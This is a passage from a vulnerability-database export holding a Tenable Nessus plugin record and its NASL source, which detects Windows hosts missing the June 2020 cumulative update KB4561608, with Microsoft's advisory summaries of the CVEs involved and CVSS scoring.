CVE-2020-1276, CVE-2020-1316)\n\n - A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n (CVE-2020-1301)\n\n - An elevation of privilege vulnerability exists in Windows Installer because of the way Windows Installer handles certain filesystem operations. (CVE-2020-1277, CVE-2020-1302, CVE-2020-1312)\n\n - An information disclosure vulnerability exists in the way that Microsoft Edge handles cross-origin requests.\n An attacker who successfully exploited this vulnerability could determine the origin of all webpages in the affected browser. (CVE-2020-1242)\n\n - An elevation of privilege vulnerability exists when an OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when Group Policy improperly checks access. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1317)\n\n - An elevation of privilege vulnerability exists when Windows Lockscreen fails to properly load spotlight images from a secure location. An attacker who successfully exploited the vulnerability could execute commands with elevated permissions. An authenticated attacker could modify a registry value to exploit this vulnerability. The security update addresses the vulnerability by ensuring that the spotlight images are always loaded from a secure location. (CVE-2020-1279)\n\n - An elevation of privilege vulnerability exists in OpenSSH for Windows when it does not properly restrict access to configuration settings. An attacker who successfully exploited this vulnerability could replace the shell with a malicious binary. (CVE-2020-1292)\n\n - An elevation of privilege vulnerability exists in the way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0915, CVE-2020-0916)\n\n - An elevation of privilege vulnerability exists when Windows Modules Installer Service improperly handles class object members. A locally authenticated attacker could run arbitrary code with elevated system privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. The update addresses the vulnerability by correcting how Windows handles calls to preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when Component Object Model (COM) client uses special case IIDs. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1311)\n\n - An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251, CVE-2020-1253, CVE-2020-1310)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1237)\n\n - An elevation of privilege vulnerability exists when DirectX improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-1258)\n\n - An elevation of privilege vulnerability exists when Windows Error Reporting improperly handles objects in memory. (CVE-2020-1234)\n\n - A spoofing vulnerability exists when theMicrosoft Edge (Chromium-based) in IE Mode improperly handles specific redirects. An attacker who successfully exploits the IE Mode vulnerability could trick a user into believing that the user was on a legitimate website. The specially crafted website could either spoof content or serve as a pivot to chain an attack with other vulnerabilities in web services. (CVE-2020-1220)\n\n - An information disclosure vulnerability exists when Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-1232)\n\n - A remote code execution vulnerability exists when the Windows Shell does not properly validate file paths. An attacker who successfully exploited this vulnerability could run arbitrary code in the context of the current user. If the current user is logged on as an administrator, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with elevated privileges. Users whose accounts are configured to have fewer privileges on the system could be less impacted than users who operate with administrative privileges. (CVE-2020-1286)\n\n - An elevation of privilege vulnerability exists in Windows Text Service Framework (TSF) when the TSF server fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this vulnerability could run arbitrary code in a privileged process. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1314)\n\n - A denial of service vulnerability exists when Connected User Experiences and Telemetry Service improperly handles file operations. An attacker who successfully exploited this vulnerability could cause a system to stop responding. (CVE-2020-1244)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-06-09T00:00:00", "type": "nessus", "title": "KB4561608: Windows 10 Version 1809 and Windows Server 2019 June 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0915", "CVE-2020-0916", "CVE-2020-0986", "CVE-2020-1073", "CVE-2020-1160", "CVE-2020-1162", "CVE-2020-1194", "CVE-2020-1196", "CVE-2020-1197", "CVE-2020-1201", "CVE-2020-1202", "CVE-2020-1203", "CVE-2020-1204", "CVE-2020-1207", "CVE-2020-1208", "CVE-2020-1211", "CVE-2020-1212", "CVE-2020-1213", "CVE-2020-1214", "CVE-2020-1215", "CVE-2020-1216", "CVE-2020-1217", "CVE-2020-1219", "CVE-2020-1220", "CVE-2020-1222", "CVE-2020-1230", "CVE-2020-1231", "CVE-2020-1232", "CVE-2020-1233", "CVE-2020-1234", "CVE-2020-1235", "CVE-2020-1236", "CVE-2020-1237", "CVE-2020-1238", "CVE-2020-1239", "CVE-2020-1241", "CVE-2020-1242", "CVE-2020-1244", "CVE-2020-1246", "CVE-2020-1247", "CVE-2020-1251", "CVE-2020-1253", "CVE-2020-1254", "CVE-2020-1255", "CVE-2020-1257", "CVE-2020-1258", "CVE-2020-1259", "CVE-2020-1260", "CVE-2020-1261", "CVE-2020-1262", "CVE-2020-1263", "CVE-2020-1264", "CVE-2020-1266", "CVE-2020-1269", "CVE-2020-1270", "CVE-2020-1271", "CVE-2020-1272", "CVE-2020-1274", "CVE-2020-1276", "CVE-2020-1277", "CVE-2020-1278", "CVE-2020-1279", "CVE-2020-1280", "CVE-2020-1281", "CVE-2020-1282", "CVE-2020-1283", "CVE-2020-1286", "CVE-2020-1287", "CVE-2020-1290", "CVE-2020-1291", "CVE-2020-1292", "CVE-2020-1293", "CVE-2020-1294", "CVE-2020-1296", "CVE-2020-1299", "CVE-2020-1300", "CVE-2020-1301", "CVE-2020-1302", "CVE-2020-1304", "CVE-2020-1305", "CVE-2020-1306", "CVE-2020-1309", "CVE-2020-1310", "CVE-2020-1311", "CVE-2020-1312", "CVE-2020-1314", "CVE-2020-1315", "CVE-2020-1316", "CVE-2020-1317", "CVE-2020-1324", "CVE-2020-1334", "CVE-2020-1348"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS20_JUN_4561608.NASL", "href": "https://www.tenable.com/plugins/nessus/137256", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(137256);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2020-0915\",\n \"CVE-2020-0916\",\n \"CVE-2020-0986\",\n \"CVE-2020-1073\",\n \"CVE-2020-1160\",\n \"CVE-2020-1162\",\n \"CVE-2020-1194\",\n \"CVE-2020-1196\",\n \"CVE-2020-1197\",\n \"CVE-2020-1201\",\n \"CVE-2020-1202\",\n \"CVE-2020-1203\",\n \"CVE-2020-1204\",\n \"CVE-2020-1207\",\n \"CVE-2020-1208\",\n \"CVE-2020-1211\",\n \"CVE-2020-1212\",\n \"CVE-2020-1213\",\n \"CVE-2020-1214\",\n \"CVE-2020-1215\",\n \"CVE-2020-1216\",\n \"CVE-2020-1217\",\n \"CVE-2020-1219\",\n \"CVE-2020-1220\",\n \"CVE-2020-1222\",\n \"CVE-2020-1230\",\n \"CVE-2020-1231\",\n \"CVE-2020-1232\",\n \"CVE-2020-1233\",\n \"CVE-2020-1234\",\n \"CVE-2020-1235\",\n \"CVE-2020-1236\",\n \"CVE-2020-1237\",\n \"CVE-2020-1238\",\n \"CVE-2020-1239\",\n \"CVE-2020-1241\",\n \"CVE-2020-1242\",\n \"CVE-2020-1244\",\n \"CVE-2020-1246\",\n \"CVE-2020-1247\",\n \"CVE-2020-1251\",\n \"CVE-2020-1253\",\n \"CVE-2020-1254\",\n \"CVE-2020-1255\",\n \"CVE-2020-1257\",\n \"CVE-2020-1258\",\n \"CVE-2020-1259\",\n \"CVE-2020-1260\",\n \"CVE-2020-1261\",\n \"CVE-2020-1262\",\n \"CVE-2020-1263\",\n \"CVE-2020-1264\",\n \"CVE-2020-1266\",\n \"CVE-2020-1269\",\n \"CVE-2020-1270\",\n \"CVE-2020-1271\",\n \"CVE-2020-1272\",\n \"CVE-2020-1274\",\n \"CVE-2020-1276\",\n \"CVE-2020-1277\",\n \"CVE-2020-1278\",\n \"CVE-2020-1279\",\n \"CVE-2020-1280\",\n \"CVE-2020-1281\",\n \"CVE-2020-1282\",\n \"CVE-2020-1283\",\n \"CVE-2020-1286\",\n \"CVE-2020-1287\",\n \"CVE-2020-1290\",\n \"CVE-2020-1291\",\n \"CVE-2020-1292\",\n \"CVE-2020-1293\",\n \"CVE-2020-1294\",\n \"CVE-2020-1296\",\n \"CVE-2020-1299\",\n \"CVE-2020-1300\",\n \"CVE-2020-1301\",\n \"CVE-2020-1302\",\n \"CVE-2020-1304\",\n \"CVE-2020-1305\",\n \"CVE-2020-1306\",\n \"CVE-2020-1309\",\n \"CVE-2020-1310\",\n \"CVE-2020-1311\",\n \"CVE-2020-1312\",\n \"CVE-2020-1314\",\n \"CVE-2020-1315\",\n \"CVE-2020-1316\",\n \"CVE-2020-1317\",\n \"CVE-2020-1324\",\n \"CVE-2020-1334\",\n \"CVE-2020-1348\"\n );\n script_xref(name:\"MSKB\", value:\"4561608\");\n script_xref(name:\"MSFT\", value:\"MS20-4561608\");\n script_xref(name:\"IAVA\", value:\"2020-A-0247-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0248-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0256-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0051\");\n\n script_name(english:\"KB4561608: Windows 10 Version 1809 and Windows Server 2019 June 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4561608.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n way that the wlansvc.dll handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An elevation of privilege vulnerability exists when the\n Windows Backup Service improperly handles file\n operations. (CVE-2020-1271)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-1348)\n\n - A vulnerability exists in the way the Windows\n Diagnostics & feedback settings app handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could cause additional diagnostic data\n from the affected device to be sent to Microsoft.\n (CVE-2020-1296)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1290)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2020-1281)\n\n - An information disclosure vulnerability exists in the\n way Windows Error Reporting (WER) handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1261,\n CVE-2020-1263)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n IIS module improperly handles uploaded content. An\n attacker who successfully exploited this vulnerability\n could upload restricted file types to an IIS-hosted\n folder. (CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2020-1197)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1291)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-1238,\n CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector or the Visual Studio\n Standard Collector fail to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1202, CVE-2020-1203)\n\n - An elevation of privilege vulnerability exists when\n Windows Mobile Device Management (MDM) Diagnostics\n improperly handles junctions. An attacker who\n successfully exploited this vulnerability could bypass\n access restrictions to delete files. (CVE-2020-1204)\n\n - An elevation of privilege vulnerability exists in the\n way the Windows Now Playing Session Manager handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2020-1201)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2020-1283)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists in the\n way that the Connected Devices Platform Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1211)\n\n - A security feature bypass vulnerability exists when\n Windows Kernel fails to properly sanitize certain\n parameters. (CVE-2020-1241)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector Service improperly\n handles file operations. An attacker who successfully\n exploited this vulnerability could gain elevated\n privileges. An attacker with unprivileged access to a\n vulnerable system could exploit this vulnerability. The\n security update addresses the vulnerability by ensuring\n the Diagnostics Hub Standard Collector Service properly\n handles file operations. (CVE-2020-1257, CVE-2020-1278,\n CVE-2020-1293)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Bluetooth Service handles objects\n in memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1280)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2020-1272)\n\n - An information disclosure vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could read memory that was freed and might run arbitrary\n code in an elevated context. An attacker could exploit\n this vulnerability by running a specially crafted\n application on the victim system. The update addresses\n the vulnerability by correcting the way the Windows\n Runtime handles objects in memory. (CVE-2020-1217)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1315)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows WalletService handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1287, CVE-2020-1294)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows fails to properly handle cabinet\n files. (CVE-2020-1300)\n\n - An elevation of privilege (user to user) vulnerability\n exists in Windows Security Health Service when handling\n certain objects in memory. (CVE-2020-1162,\n CVE-2020-1324)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-1213, CVE-2020-1214,\n CVE-2020-1215, CVE-2020-1216, CVE-2020-1230,\n CVE-2020-1260)\n\n - An elevation of privilege vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in an elevated context. An\n attacker could exploit this vulnerability by running a\n specially crafted application on the victim system. The\n update addresses the vulnerability by correcting the way\n the Windows Runtime handles objects in memory.\n (CVE-2020-1231, CVE-2020-1233, CVE-2020-1235,\n CVE-2020-1282, CVE-2020-1304, CVE-2020-1306,\n CVE-2020-1334)\n\n - An elevation of privilege vulnerability exists when the\n Microsoft Store Runtime improperly handles memory.\n (CVE-2020-1222, CVE-2020-1309)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1219)\n\n - A denial of service vulnerability exists when Windows\n Registry improperly handles filesystem operations. An\n attacker who successfully exploited the vulnerability\n could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-1299)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-1160)\n\n - A remote code execution vulnerability exists in the way\n that the ChakraCore scripting engine handles objects in\n memory. The vulnerability could corrupt memory in such a\n way that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1073)\n\n - An elevation of privilege vulnerability exists when the\n Windows State Repository Service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n an elevated context. An attacker could exploit this\n vulnerability by running a specially crafted application\n on the victim system. The update addresses the\n vulnerability by correcting the way the Windows State\n Repository Service handles objects in memory.\n (CVE-2020-1305)\n\n - A security feature bypass vulnerability exists when\n Windows Host Guardian Service improperly handles hashes\n recorded and logged. An attacker who successfully\n exploited the vulnerability could tamper with the log\n file. In an attack scenario, an attacker can change\n existing event log types to a type the parsers do not\n interpret allowing an attacker to append their own hash\n without triggering an alert. The update addresses the\n vulnerability by correcting how Windows Host Guardian\n Service handles logging of the measured boot hash.\n (CVE-2020-1259)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-0986, CVE-2020-1246, CVE-2020-1262,\n CVE-2020-1264, CVE-2020-1266, CVE-2020-1269,\n CVE-2020-1274, CVE-2020-1276, CVE-2020-1316)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2020-1301)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2020-1277,\n CVE-2020-1302, CVE-2020-1312)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Edge handles cross-origin requests.\n An attacker who successfully exploited this\n vulnerability could determine the origin of all webpages\n in the affected browser. (CVE-2020-1242)\n\n - An elevation of privilege vulnerability exists when an\n OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when\n Group Policy improperly checks access. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. (CVE-2020-1317)\n\n - An elevation of privilege vulnerability exists when\n Windows Lockscreen fails to properly load spotlight\n images from a secure location. An attacker who\n successfully exploited the vulnerability could execute\n commands with elevated permissions. An authenticated\n attacker could modify a registry value to exploit this\n vulnerability. The security update addresses the\n vulnerability by ensuring that the spotlight images are\n always loaded from a secure location. (CVE-2020-1279)\n\n - An elevation of privilege vulnerability exists in\n OpenSSH for Windows when it does not properly restrict\n access to configuration settings. An attacker who\n successfully exploited this vulnerability could replace\n the shell with a malicious binary. (CVE-2020-1292)\n\n - An elevation of privilege vulnerability exists in the\n way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0915, CVE-2020-0916)\n\n - An elevation of privilege vulnerability exists when\n Windows Modules Installer Service improperly handles\n class object members. A locally authenticated attacker\n could run arbitrary code with elevated system\n privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. The update addresses the\n vulnerability by correcting how Windows handles calls to\n preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when\n Component Object Model (COM) client uses special case\n IIDs. An attacker who successfully exploited this\n vulnerability could run arbitrary code with elevated\n system privileges. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-1311)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251,\n CVE-2020-1253, CVE-2020-1310)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1237)\n\n - An elevation of privilege vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in kernel mode. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-1258)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting improperly handles objects in\n memory. (CVE-2020-1234)\n\n - A spoofing vulnerability exists when theMicrosoft Edge\n (Chromium-based) in IE Mode improperly handles specific\n redirects. An attacker who successfully exploits the IE\n Mode vulnerability could trick a user into believing\n that the user was on a legitimate website. The specially\n crafted website could either spoof content or serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2020-1220)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1232)\n\n - A remote code execution vulnerability exists when the\n Windows Shell does not properly validate file paths. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in the context of the current\n user. If the current user is logged on as an\n administrator, an attacker could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with elevated privileges. Users whose accounts\n are configured to have fewer privileges on the system\n could be less impacted than users who operate with\n administrative privileges. (CVE-2020-1286)\n\n - An elevation of privilege vulnerability exists in\n Windows Text Service Framework (TSF) when the TSF server\n fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this\n vulnerability could run arbitrary code in a privileged\n process. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-1314)\n\n - A denial of service vulnerability exists when Connected\n User Experiences and Telemetry Service improperly\n handles file operations. An attacker who successfully\n exploited this vulnerability could cause a system to\n stop responding. (CVE-2020-1244)\");\n # https://support.microsoft.com/en-us/help/4561608/windows-10-update-kb4561608\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?42cd5594\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4561608.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1299\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-1317\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('install_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-06';\nkbs = make_list(\n '4561608'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'17763',\n rollup_date:'06_2020',\n bulletin:bulletin,\n rollup_kb_list:[4561608])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T15:14:14", "description": "The remote Windows host is missing security update 4561621.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the way that the wlansvc.dll handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2020-1348)\n\n - An information disclosure vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-1290)\n\n - A remote code execution vulnerability exists when Microsoft Windows OLE fails to properly validate user input. An attacker could exploit the vulnerability to execute malicious code. (CVE-2020-1281)\n\n - An information disclosure vulnerability exists in the way Windows Error Reporting (WER) handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-1261, 